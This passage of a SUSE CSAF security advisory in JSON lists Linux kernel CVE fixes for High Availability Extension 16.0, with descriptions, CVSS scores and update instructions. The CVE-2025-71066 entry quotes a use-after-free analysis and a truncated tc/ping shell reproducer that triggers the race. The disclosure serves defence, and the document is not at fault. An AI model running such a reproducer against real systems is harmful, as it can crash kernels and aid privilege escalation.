"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68821"
},
{
"cve": "CVE-2025-68822",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68822"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: alps - fix use-after-free bugs caused by dev3_register_work\n\nThe dev3_register_work delayed work item is initialized within\nalps_reconnect() and scheduled upon receipt of the first bare\nPS/2 packet from an external PS/2 device connected to the ALPS\ntouchpad. During device detachment, the original implementation\ncalls flush_workqueue() in psmouse_disconnect() to ensure\ncompletion of dev3_register_work. However, the flush_workqueue()\nin psmouse_disconnect() only blocks and waits for work items that\nwere already queued to the workqueue prior to its invocation. Any\nwork items submitted after flush_workqueue() is called are not\nincluded in the set of tasks that the flush operation awaits.\nThis means that after flush_workqueue() has finished executing,\nthe dev3_register_work could still be scheduled. Although the\npsmouse state is set to PSMOUSE_CMD_MODE in psmouse_disconnect(),\nthe scheduling of dev3_register_work remains unaffected.\n\nThe race condition can occur as follows:\n\nCPU 0 (cleanup path) | CPU 1 (delayed work)\npsmouse_disconnect() |\n psmouse_set_state() |\n flush_workqueue() | alps_report_bare_ps2_packet()\n alps_disconnect() | psmouse_queue_work()\n kfree(priv); // FREE | alps_register_bare_ps2_mouse()\n | priv = container_of(work...); // USE\n | priv-\u003edev3 // USE\n\nAdd disable_delayed_work_sync() in alps_disconnect() to ensure\nthat dev3_register_work is properly canceled and prevented from\nexecuting after the alps_data structure has been deallocated.\n\nThis bug is identified by static analysis.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68822",
"url": "https://www.suse.com/security/cve/CVE-2025-68822"
},
{
"category": "external",
"summary": "SUSE Bug 1256668 for CVE-2025-68822",
"url": "https://bugzilla.suse.com/1256668"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68822"
},
{
"cve": "CVE-2025-71064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71064",
"url": "https://www.suse.com/security/cve/CVE-2025-71064"
},
{
"category": "external",
"summary": "SUSE Bug 1256654 for CVE-2025-71064",
"url": "https://bugzilla.suse.com/1256654"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "external",
"summary": "SUSE Bug 1258005 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1258005"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71073",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71073"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: lkkbd - disable pending work before freeing device\n\nlkkbd_interrupt() schedules lk-\u003etq via schedule_work(), and the work\nhandler lkkbd_reinit() dereferences the lkkbd structure and its\nserio/input_dev fields.\n\nlkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd\nstructure without preventing the reinit work from being queued again\nuntil serio_close() returns. This can allow the work handler to run\nafter the structure has been freed, leading to a potential use-after-free.\n\nUse disable_work_sync() instead of cancel_work_sync() to ensure the\nreinit work cannot be re-queued, and call it both in lkkbd_disconnect()\nand in lkkbd_connect() error paths after serio_open().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71073",
"url": "https://www.suse.com/security/cve/CVE-2025-71073"
},
{
"category": "external",
"summary": "SUSE Bug 1256632 for CVE-2025-71073",
"url": "https://bugzilla.suse.com/1256632"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71073"
},
{
"cve": "CVE-2025-71076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71076"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Limit num_syncs to prevent oversized allocations\n\nThe OA open parameters did not validate num_syncs, allowing\nuserspace to pass arbitrarily large values, potentially\nleading to excessive allocations.\n\nAdd check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,\nreturning -EINVAL when the limit is violated.\n\nv2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)\n\n(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71076",
"url": "https://www.suse.com/security/cve/CVE-2025-71076"
},
{
"category": "external",
"summary": "SUSE Bug 1256627 for CVE-2025-71076",
"url": "https://bugzilla.suse.com/1256627"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71076"
},
{
"cve": "CVE-2025-71077",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71077"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
